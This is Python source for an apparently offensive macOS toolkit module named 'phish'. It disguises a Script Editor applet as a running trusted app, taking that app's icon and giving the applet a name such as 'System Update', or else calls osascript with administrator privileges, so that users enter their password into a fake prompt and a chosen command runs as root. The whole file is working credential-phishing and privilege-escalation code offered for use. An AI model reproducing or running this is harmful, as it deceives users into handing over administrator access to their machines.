python source code of phish

"""phishes for sudo with AppleScript"""
import json
import os
import plistlib
from time import sleep

from .general import (DEFAULT_COMMAND, app_info, app_installed, app_running,
                      interaction_prompt, osascript, random_string)

__cve__ = "0000-00000"
__credits__ = "thehappydinoa"


def edit_app_info(app_path, prompt):
    """edit app info"""
    plist = app_path + "/Contents/Info.plist"
    info = plistlib.readPlist(plist)
    info["CFBundleName"] = prompt
    info["CFBundleIdentifier"] = "com.apple.ScriptEditor.id." + \
        prompt.replace(" ", "")
    plistlib.writePlist(info, plist)


def admin_prompt(app=None, icon_path=None, prompt="System Update", command="echo hello"):
    """prompts with administrator privileges"""
    rand = random_string()
    print("\nPrompting: " + prompt)
    if app:
        app_path = "Prompt.app"
        zip_path = "Prompt.app.zip"
        if not os.path.exists(app_path) and os.path.exists(zip_path):
            os.system("unzip " + zip_path)
        full_app_path = app_installed(app)
        edit_app_info(app_path, prompt)
        if icon_path:
            icon_path = full_app_path + icon_path
        else:
            plist = app_info(app)
            icon_path = full_app_path + "/Contents/Resources/" + \
                plist.get("CFBundleIconFile")
        success_file = "/tmp/{success}".format(success=rand)
        os.system(
            "cp \"{icon_path}\" \"{app_path}/Contents/Resources/applet.icns\"; touch {app_path};".format(icon_path=icon_path, app_path=app_path))
        payload = """open {app_path} --args "{command}; touch {success_file}; chmod 666 {success_file}; sleep 5; rm {success_file}" "{prompt}" """.format(
            app_path=app_path, prompt=prompt, command=command.replace('"', '\"'), success_file=success_file)
        os.system(payload)
        print("Application Launched...")
        wait = 0
        while not os.path.isfile(success_file):
            if wait > 60:
                kill_app(app_path)
                return
            if not app_running(app_path):
                return
            sleep(1)
            wait += 1
        return True
    payload = """osascript <<END
      set command to "{command}; echo {success}"
      return do shell script command with prompt "{prompt}" with administrator privileges
    END""".format(prompt=prompt, command=command, success=rand)
    response = osascript(payload)
    return rand in response


def vulnerable(version):
    """checks vulnerability"""
    return interaction_prompt("Do you want to try to phish for sudo?")


def run():
    """runs exploit"""
    try:
        with open("apps.json") as json_file:
            APPS = json.load(json_file)
    except ValueError as error:
        print("Failed to load apps.json: " + str(error))
        APPS = dict()

    for priority_level in sorted(APPS.keys()):
        for app in APPS.get(priority_level).keys():
            if app_installed(app) and app_running(app):
                app_values = APPS.get(priority_level).get(app)
                return admin_prompt(app=app, icon_path=app_values[0], prompt=app_values[1], command=DEFAULT_COMMAND)
    return admin_prompt(app="System Preferences.app", prompt="System Update", command=DEFAULT_COMMAND)